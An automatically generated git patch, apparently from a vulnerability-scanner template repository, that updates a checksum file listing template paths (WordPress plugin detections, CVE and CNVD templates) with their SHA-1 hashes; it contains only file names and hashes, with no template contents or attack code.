4a0a004730450220555e72b8a7ce8ba848bc013ba68905a0892db7854b4d5a487b4b342d5595b0cf0221009227b34829104b03a2a178ba1afc5c13f05c4db7f63a5971c34a3a95685fa9bb:922c64590222798bb761d5b6d8e72950 From 9723f1d00589d33fca0fd63884343f6d17614f20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 06:39:42 +0000 Subject: [PATCH 1442/1841] Auto Generated Templates Checksum [Fri Jul 19 06:39:42 UTC 2024] :robot: --- templates-checksum.txt | 428 ++++++++++++++++++++--------------------- 1 file changed, 214 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5617f6874d..eddfdab11c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -736,10 +736,10 @@ helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f22 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 +helpers/wordpress/plugins/advanced-custom-fields.txt:4d8fa21645bb09d6fe70b894a8fc47e15acf875e helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:deb3b4d0e34b7f9fe7def52318e7a4edf3931c5d helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 @@ -780,7 +780,7 @@ helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051 helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e -helpers/wordpress/plugins/duplicator.txt:fa05bd88f39ee8582aa5f061e1b33c01a4907d22 +helpers/wordpress/plugins/duplicator.txt:78c1f7ff53f4bd87518687e48914ce6c53a69f17 helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae @@ -800,7 +800,7 @@ helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd3 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:4c8c0a65f9f10ab6175d297b0d38cb82de78d3a8 -helpers/wordpress/plugins/forminator.txt:0b6a16f2a55e024ce70078ac1af9191ccab9fc42 +helpers/wordpress/plugins/forminator.txt:bc78bd77fb0b7968fa063868c2ab8461de5d9da5 helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c @@ -850,7 +850,7 @@ helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 helpers/wordpress/plugins/newsletter.txt:1367078ebee3d42232e6c2aaa74f83439f5d235e helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 -helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 +helpers/wordpress/plugins/nextgen-gallery.txt:b4965036e178930c67affe46a8868c680bc27ea4 helpers/wordpress/plugins/ninja-forms.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae @@ -873,9 +873,9 @@ helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e -helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b +helpers/wordpress/plugins/redux-framework.txt:dfd43a95dc2d1f037030918b6e7e05f995699d46 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:d23cb39919efcacdfc1a634287181ffd084f7d0f +helpers/wordpress/plugins/royal-elementor-addons.txt:2c41dc2f1e32157c60aaaa5ee56094386d5c4194 helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d5268bae helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb @@ -898,7 +898,7 @@ helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23 helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:f7d7dab88570c6cb518c4022c6b0be1c5b833457 +helpers/wordpress/plugins/the-events-calendar.txt:6edccbf589807e4171353b69b32d148fb22948d3 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa @@ -919,9 +919,9 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:60d712d9a12f5416daabb3565821281c3cba1d4c +helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da @@ -945,7 +945,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:982b37978de445a43803deafb09df7076adbabc4 +helpers/wordpress/plugins/wp-statistics.txt:7915b1aaf21d82ad463ef814d16832b49d63dddd helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -954,7 +954,7 @@ helpers/wordpress/plugins/wpforms-lite.txt:c7624be5ee3565a7d73bf89b73d5c6cb6a8a8 helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 helpers/wordpress/plugins/wpvivid-backuprestore.txt:42932d0fb47c40d001ff73872d5fff049a1361b5 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 -helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 +helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:32f71be2b08c58a10d49f26fdb35bf06c8f20122 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 http/cnvd/2017/CNVD-2017-06001.yaml:5ce62ea8bef46ad255ccbd17bad1a3fa2ea4e651 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb @@ -1409,7 +1409,7 @@ http/cves/2017/CVE-2017-12617.yaml:b6237fb4274a188b1f9ad448e320821a8ea88d79 http/cves/2017/CVE-2017-12629.yaml:c75d842f4374f7ea0aa974ae125618cd1d15248c http/cves/2017/CVE-2017-12635.yaml:39fb356e37aa76522032d44a91bd9f37ac477b70 http/cves/2017/CVE-2017-12637.yaml:add753669b23f66172a951bb76ac9749967b1f72 -http/cves/2017/CVE-2017-12794.yaml:c56afff76e73c7654ea22b8a35d2b410d92bccc6 +http/cves/2017/CVE-2017-12794.yaml:f7f231965db8de81b24e4b0780951356f5cf530d http/cves/2017/CVE-2017-14135.yaml:2c9bcf7d7ce6e624fe9d3c1c62751f76c28e999d http/cves/2017/CVE-2017-14186.yaml:1884d55d9aa8671e341f7076a11a68e3fc8fba4a http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b @@ -7305,229 +7305,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:dd1ab7bd15d2f942860074930bb21c08dd182085 -http/technologies/wordpress/plugins/add-to-any.yaml:748b97de00055b19c1ab04572b300e69e13aabbe -http/technologies/wordpress/plugins/admin-menu-editor.yaml:a5a4bfa7c0568152af9d5224aeefba1b4949be19 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:92132478295377132aac2fe656c4e9f328f75fc8 -http/technologies/wordpress/plugins/akismet.yaml:3c3f3ab7fe0b244f2fe459acc48ba37ab9925617 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:158cd19470a0af5c64828ff5125a39ad10057ef3 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:62bf79663a3de9ab14fa286940501870c6afd6d2 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9c3134a7651c24053a20cc5863a8e4d53db49338 -http/technologies/wordpress/plugins/amp.yaml:2b99fe3c44067235b77c560b482d726e58fa1168 -http/technologies/wordpress/plugins/antispam-bee.yaml:a78daee911360ef2a92452acc9c344e3123730ba -http/technologies/wordpress/plugins/astra-sites.yaml:6173df41bcca1a90814d3dd8905e7d64fc376030 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:6912a4b8d4d2bb84964c58b10081054d7e3a98c8 -http/technologies/wordpress/plugins/backwpup.yaml:6dbbeaed387071cee2308803ace60dbae9265345 -http/technologies/wordpress/plugins/better-search-replace.yaml:e60cb1425e7185e48bbfc235fcb5c9e50e10e525 -http/technologies/wordpress/plugins/better-wp-security.yaml:c212a433a5209c8e4d8210ea41d65bddafa4f5a3 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:409428a7d77b039084ebcec0284a5ee0d0992928 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:fcf1f6aa3fbc2b79d0ee3f810bcbca44616efe06 -http/technologies/wordpress/plugins/breeze.yaml:2582e5883972f55e79e49b22bf3c91dbe98e9da5 -http/technologies/wordpress/plugins/broken-link-checker.yaml:e9477b621c7bd5051a0f5576f7c2c3be1dd177dc -http/technologies/wordpress/plugins/chaty.yaml:6bf3fd8e9b8e49b09262da3e10b4c3d68bf0e8dd -http/technologies/wordpress/plugins/child-theme-configurator.yaml:77366cc87a8fb921ad36ba1be8decdfa1871623d -http/technologies/wordpress/plugins/classic-editor.yaml:45c9c6f69bd78cc3cce89fee5e2fdaf34b4e7ada -http/technologies/wordpress/plugins/classic-widgets.yaml:cd68f5ab82430b2c3bffda4e149be5966f6ccc26 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:f8607304b34e93ba2f208b710dc16ac29272c918 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:439499fb4d1618c797d58b74699e425a1c8bb279 -http/technologies/wordpress/plugins/coblocks.yaml:e175b79d9f9382a122a2f51d58e1da4b51d7f73f -http/technologies/wordpress/plugins/code-snippets.yaml:49e4cfdfe2f0af2b7ff1ab52f389e1b1a19f1d9a -http/technologies/wordpress/plugins/coming-soon.yaml:fb1aa4bcfb543c563774269eb62b6ab44e9f42b1 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:ecc8273c68c3a853e26dda5b6c3cc5b891a23f0e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:a2f0e2429d0e50a76030108dcdec1fff5fd6dc1d -http/technologies/wordpress/plugins/contact-form-7.yaml:db86b90e4ae2d9bc00bd5a52eeaed59617209f9a -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6763f5e9faea0b627f13a46b75f253776ff6fd1f -http/technologies/wordpress/plugins/cookie-law-info.yaml:e6e42ce610faf00f99eea03e6e9f8a05273c377f -http/technologies/wordpress/plugins/cookie-notice.yaml:e06abb63f06bf1ba596fa8425dc5b7db4e8c49ca -http/technologies/wordpress/plugins/copy-delete-posts.yaml:132e38d5ad88dda2ed627399b5e1879a35250b2e -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:0c5ebbd8801f9a3978ad15b7be5b4d16630fd0cb -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2a44d350b8a1b00aae6d747ca1e4259edaeed9a3 -http/technologies/wordpress/plugins/custom-css-js.yaml:58b772c479aea53b9bd2004a05e57062fcc083c1 -http/technologies/wordpress/plugins/custom-fonts.yaml:99bdde7e1265517f96b9a58543f5f18d7e49ef28 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e5005a6c46daa9ddde2b5fe3f295797b41983707 -http/technologies/wordpress/plugins/disable-comments.yaml:f273cda512b6088585c2d968503ab5a98bcf6aef -http/technologies/wordpress/plugins/disable-gutenberg.yaml:be5ffdf6e7c938af2635595e9e7f44466e10f8bc -http/technologies/wordpress/plugins/duplicate-page.yaml:e51e03ceb1d7b680c550c5600c5f5bf5f36ddade -http/technologies/wordpress/plugins/duplicate-post.yaml:f1ba1b83501b87505337e91a4fc92e68ae5363a4 -http/technologies/wordpress/plugins/duplicator.yaml:c9a8f62655fccd06fa16fd7f525ef9ea0e374d15 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:09bd4b1d8bf81302ba2b9bf51bdbedf064c7a158 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:f44cad3c23c8932d763a7eee503da79ee4702c3d -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2a11e58f33a88ef68e515ec3bdd9ddbf0957dc70 -http/technologies/wordpress/plugins/elementor.yaml:e3cf065fd085eb25ac7f9e559ba727b5e6c1aa48 -http/technologies/wordpress/plugins/elementskit-lite.yaml:5f447a8f4e322ea344e7b0bccdcac08fc75179b5 -http/technologies/wordpress/plugins/enable-media-replace.yaml:8bc0175426a2900239eed761bb4d38b512f45c18 -http/technologies/wordpress/plugins/envato-elements.yaml:35ccb7a16618ad4b3ad58904470ab957dd4da137 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:94241230893db77bbc2f1ca05255fc953be755f7 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:45f82d0ff72c35cd1ed9e9c48eb4da29fc6ec8e3 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:27d9924e135bf2e7e1d4e6cee969b789b3d97f38 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:8418dd1122cfe78b40eda9a2f1833131d0af38e6 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:2237edd0a886dfdd1210498d1d90a76e92932edd -http/technologies/wordpress/plugins/flamingo.yaml:49f5663f3adb56ef2286ca4c751aa387409911e6 -http/technologies/wordpress/plugins/fluentform.yaml:71f3c44b3b26b1d956156e7cc81cc60467f8091d -http/technologies/wordpress/plugins/font-awesome.yaml:9b80b42f8acf45a543339f16a0a58ede26c6d95c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:9a2cc12558b36e0e6960dfe2a8a54b8c8e245433 -http/technologies/wordpress/plugins/formidable.yaml:70b5de2a47004bd6258ad9eabe2c36cd05d1c1c2 -http/technologies/wordpress/plugins/forminator.yaml:0aa451fe707a048b144b710ab412265157571fd4 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:883d75814373750e1df05afcd3a5cb93e4ab6ad3 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:a561687a45e0bfb7b8999b476689d33c504730ab -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:cc4ad273c5c7671a6cf744eb2453ab6b3c6a42ef -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:59c418c0cafa1877a0af217a45526e488e364e51 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:23d62295daadb078a62c40b733b61f5dc972802b -http/technologies/wordpress/plugins/google-site-kit.yaml:36db040c19cc3b9cd5663381784fefae421609cb -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:2cbc36ce94917242926cd6a0500f2382b595877a -http/technologies/wordpress/plugins/gtranslate.yaml:895f923642f0a72d95542e176530d00df34b84ae -http/technologies/wordpress/plugins/gutenberg.yaml:967bdfd961d3e1557b0befa57bbd81f53d002b2d -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:74ea4f179438b89e76ab18254c92bd9344d5a71c +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:532943959f625a17812906f7df753c052a82e9ca -http/technologies/wordpress/plugins/header-footer-elementor.yaml:5b9a7a95e1e21c66fe630fa33c99e24b01406aa8 -http/technologies/wordpress/plugins/header-footer.yaml:1690ae983b7dee0886e254155de0f7c4aa50ecf8 -http/technologies/wordpress/plugins/health-check.yaml:d0061ef9ec02539a852908839a64dde2429da38c -http/technologies/wordpress/plugins/hello-dolly.yaml:e40145de2ae4657bc2b20cd85289a35d699e7e33 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:2413bb00c3677edcc8e3f952f943e5eb537f4610 -http/technologies/wordpress/plugins/hostinger.yaml:9200cef2b4394dcdacf7081857d493b74a1a961e -http/technologies/wordpress/plugins/image-optimization.yaml:4a590296ecf3a2ebc4b990191cd7d382de0268ce -http/technologies/wordpress/plugins/imagify.yaml:a3b59abec18e283996d2333c39c8923ce73c5321 -http/technologies/wordpress/plugins/imsanity.yaml:df78cb9f321aa95b20a1d5b366ce7692c0419fa0 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:e7a24bb258db2602a36d85635967b79b1e5bf5c2 